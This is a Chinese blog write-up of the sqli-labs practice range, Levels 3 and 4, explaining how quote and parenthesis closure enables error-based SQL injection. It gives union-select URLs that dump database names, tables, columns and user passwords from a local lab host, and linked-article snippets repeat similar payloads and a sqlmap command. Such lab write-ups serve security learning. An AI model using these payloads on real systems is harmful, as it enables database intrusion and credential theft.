sqli-labs Less-3~Less-4

最新推荐文章于 2024-07-25 18:52:53 发布
最新推荐文章于 2024-07-25 18:52:53 发布
阅读量190 收藏
点赞数
分类专栏: sqli-labs靶场 文章标签: sql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_47387913/article/details/115465277
版权
本文详细介绍了sqli-labs中Less-3和Less-4两个基于错误的SQL注入漏洞。通过错误信息,作者展示了如何利用单引号和双引号闭合来构造注入语句,从而获取数据库信息,包括爆库、爆表、爆字段和爆数据。这些例子展示了SQL注入的基本步骤和技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Less-3 Error based – Single quotes with twist – string(基于错误-带括号的单引号-字符串)

标题已经很明确了,但是测试测试,必须试一试。
?id=1
在这里插入图片描述

?id=1’
在这里插入图片描述

看见报错多的一个括号
?id=1"
在这里插入图片描述

?id=1’)
在这里插入图片描述

报错的时候,查询语句为:
Select login_name,select password from table where id=(‘1’)
这时候就要用到源码来看看了,git bash连接到主机,直接查看源码
在这里插入图片描述

这很对,注入点正确。
那么继续爆数据库
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,group_concat(schema_name),3 from information_schema.schemata --+
在这里插入图片描述

爆表
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘pikachu’ --+
在这里插入图片描述

爆字段
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ and table_schema=‘pikachu’ --+
在这里插入图片描述

爆数据
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,group_concat(username),group_concat(password) from users --+
在这里插入图片描述

还有多说一种,爆当前(也就是sqli-labs)的数据库的信息
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,2,concat_ws(’-’,user(),version(),database()) --+
在这里插入图片描述

Less-4 Error based – Double Quotes – String (基于错误-双引号-字符串)

同样,还是尝试将?id=1 ?id=1’ ?id=1" 分别添加到url,发现?id=1"报错,说明是字符型注入
在这里插入图片描述

还是查看源码
在这里插入图片描述

id = ‘"’.$id.’"’;
sql=“SELECT * FROM users WHERE id=(id) LIMIT 0,1”;
这样形成的语句就是:select * from users where id=(“id”) limit 0,1"
那么?id=1"),这样即闭合了前面,又闭合了后面
在这里插入图片描述

注入成功,猜字段数,爆数据库,爆表名,爆字段,爆数据与Less-3相同,只需要将?id=1’)变为?id=1")注入。

小总结:
从Less-1到Less-4都是基于错误的sql注入,切入点都是闭合问题,且都是通过回显进行注入。
Less-1: $sql="SELECT * FROM users WHERE id=‘id’ LIMIT 0,1”;
Less-2: $sql=“SELECT * FROM users WHERE id=id LIMIT 0,1”;
Less-3: $sql=“SELECT * FROM users WHERE id=(‘id’) LIMIT 0,1”;
Less-4: $id = '”’ . $id . '”’;sql=“SELECT * FROM users WHERE id=(id) LIMIT 0,1”;

2YH
关注
专栏目录
sqli-labs靶场Less-3
songling515010475的专栏
08-20 488
1、访问首页,index.php?id=1,这里的传参点是id 2、判断注入点是数字还是字符,如果是字符就需要闭合 and 1=1-- qwe and 1=2-- qwe 分析:通过以上探测发现并不起效果,考虑是不是和第一关一样需要单引号闭合,再次尝试 ' and 1=1-- qwe 分析:通过单引号闭合发现报错了,难道是双引号闭合?再次尝试 分析:尴尬了,单双引号都不行?对于初学者的我,一下子脑子短路了,于是翻了一下源代码,一下突然惊醒,还有括号没试,还是不细心呀..
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 872
一丢丢Sqli-labs小练习
sqli-labs (less-3)
kukudeshuo的博客
03-07 217
sqli-labs (less-3) 输入 http://127.0.0.1/sql1/Less-3/?id=1 http://127.0.0.1/sql1/Less-3/?id=1' http://127.0.0.1/sql1/Less-3/?id=1')--+ 根据输入1’的错误信息判断为字符型注入 查库 http://127.0.0.1/sql1/Less-3/?id=-1') union select 1,2,database()--+ 查表 http://127.0.0.1/sql1/L
sqli-labs less-3
阿刁〇的博客
03-29 325
文章目录sqli-labs less-3* 判断是否存在注入* 判断列数* 报显示位* 查询详细信息* 查询当前数据库和版本* 查询数据库下的表* 查询表下的列* 输出最终查询到的信息 sqli-labs less-3 * 判断是否存在注入 输入?id=1 回显正常 输入?id=1' 回显错误 输入?id=1" 回显正常 但根据回显信息,此题是由’)来进行闭合的,所以尝试输入’)进行闭合 输入?id=1') and 1=1 --+ 回显正常 输入?id=1') and 1=2 --+ 回显错误
Sqli-Labsless-3
ISNS的博客
02-05 1149
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labsless-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
sqli-labs练习之 Less-3
博客地址 www.sec0nd.top
06-13 499
文章目录判断是否存在注入注入方法order by 查列union select回显利用联合查询查库查表查列查字段 为了方便了解注入的语句,与上两关一样,在第三关的代码中添加 echo $sql;//输出构造的sql语句 echo "<br>";//换行符 判断是否存在注入 /?id=1 发现id是用括号和引号包裹着的 (‘1’) 注入方法 /?id=1') --+ 剩下的与less1,less2操作一致 order by 查列 ?id=1') order by 4 --+ union
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 802
一丢丢Sqli-labs小练习
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1839
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
从零记录sqli-labs学习过程 sqli-labs Less-3
fpxnb1的博客
03-24 2214
sqli-labs Less-3
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2293
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sql注入系列之Sqli-labs(less-3)
BetsyMyGirl的博客
12-02 4390
看完还不会Sql注入你来打我
网络安全-sqlmap实战之sqlilabs-Less3
关注网络安全、云原生安全
06-26 2334
类型 字符串转换错误,他又提示输入数字型ID,应该是把数字转换为了字符串 注入判断 截图 结合课程1,猜测sql语句为 select * from users where id = ('参数') LIMIT 0,1 -dbs枚举数据库 python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" -dbs 4种注入方式 枚举数据库 -tables枚举表 python sqlmap.py -u "192...
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 850
初学sql注入SQLi-LABS过关分享Less-3
Sqli-labs Less-3 题解
Zhuoqian_1的博客
03-12 386
这道题感觉还是挺简单的,废话少说,直接开始。 原页面: 1、尝试?id=1 2、尝试单引号注入 ?id=1' 报错了 分析语句为 '' 1' ') LIMIT 0,1' 语句中多了一个') ,猜测是select ... from ... where (id='$id')这种的。 3、构造 where (id='1') and 1=1 #') LIMIT 0,1 这里开始构造了个or 1=1 导致后面union注入时,语句始终为真,找了好久。。。 4、构造 where...
SQLi LABS Less-3 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第三关,sqli-labs less 3sqlilabs less3
【网络安全】sqli-labs Less-3 解题详析
等风来
05-01 3443
判断注入类型:GET1' and '1'='1,回显如下。没有回显,说明该漏洞类型为GET型单引号字符型注入。
最详细SQLi-LABS靶场 less-3教学
小明师傅博客
05-31 536
来到第三关 继续老规矩 and 1=1,and 1=2 没反应 那我们继续来用单引号来试 ’ 报错了 细心的会发现相比第一关 多出了一个 ) 我们就可以猜测后台语句可能是 select * from * where id = (’$id’) LIMIT 0,1 我们就可以构造语句了 把(‘1’) 构造成 (‘1’) sql语句 #’) 例如: ?id=1') order by 3 %23 代入进去成功通关 ...
SQLi-LABSLess3分析
haoahaoahaoahao的博客
01-15 554
可知id=-1不存在,那么select*from 表名 where (‘id=-1')不动,在url输入的命令union select 1,database(),3会启动。’) 那么--+后面的’)就被注释掉了那么简单理解变为select*from 表名 where id=(‘1‘)id=-1') union select 1,database(),3--+id=-1') union select 1,2,3--+id=1 order by 4 --+id=1’)--+正常。id=1’--+显示。
sqli-labs less-9
最新发布
02-21
### SQL注入实验室 (sqli-labs) Less-9 实验指导 #### 测试环境搭建 为了确保安全测试,建议在一个受控环境中部署 sqli-labs。可以使用虚拟机或 Docker 容器来运行该应用程序。 #### 实验目标 Less-9 是基于布尔盲注的SQL注入漏洞练习。通过向服务器发送特定构造的查询字符串,验证是否存在SQL注入漏洞并尝试获取隐藏数据。 #### 注入点分析 入口位于 URL 参数 `id` 中。当访问页面时,会显示一条新闻详情。如果存在注入,则可以通过修改此参数来进行攻击[^1]。 #### 基础检测方法 首先确认是否能够利用单引号 `&#39;` 来终止原有查询语句,并附加新的逻辑条件: - 正常请求:`http://localhost/sqli-labs/Less-9/?id=1` - 尝试闭合原查询:`http://localhost/sqli-labs/Less-9/?id=1&#39; AND &#39;1&#39;=&#39;1` 若两次响应相同则说明可能存在注入风险;反之亦然。 #### 进一步探索 一旦确定了潜在的安全隐患之后,就可以继续深入挖掘更多细节。对于布尔型盲注来说,通常采用二分法或其他枚举技术逐步推断数据库结构及内容。 例如: ```sql http://localhost/sqli-labs/Less-9/?id=-1&#39; UNION SELECT 1,2,version(),4,5 -- ``` 这条命令试图联合选择 MySQL 版本信息作为第二条记录返回给客户端展示出来。注意这里 `-1` 的作用是为了使第一条原始SELECT语句不匹配任何行从而不影响最终输出效果。 #### 防护措施探讨 针对此类漏洞的有效防御手段包括但不限于预编译语句、输入校验以及最小权限原则的应用程序设计模式等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值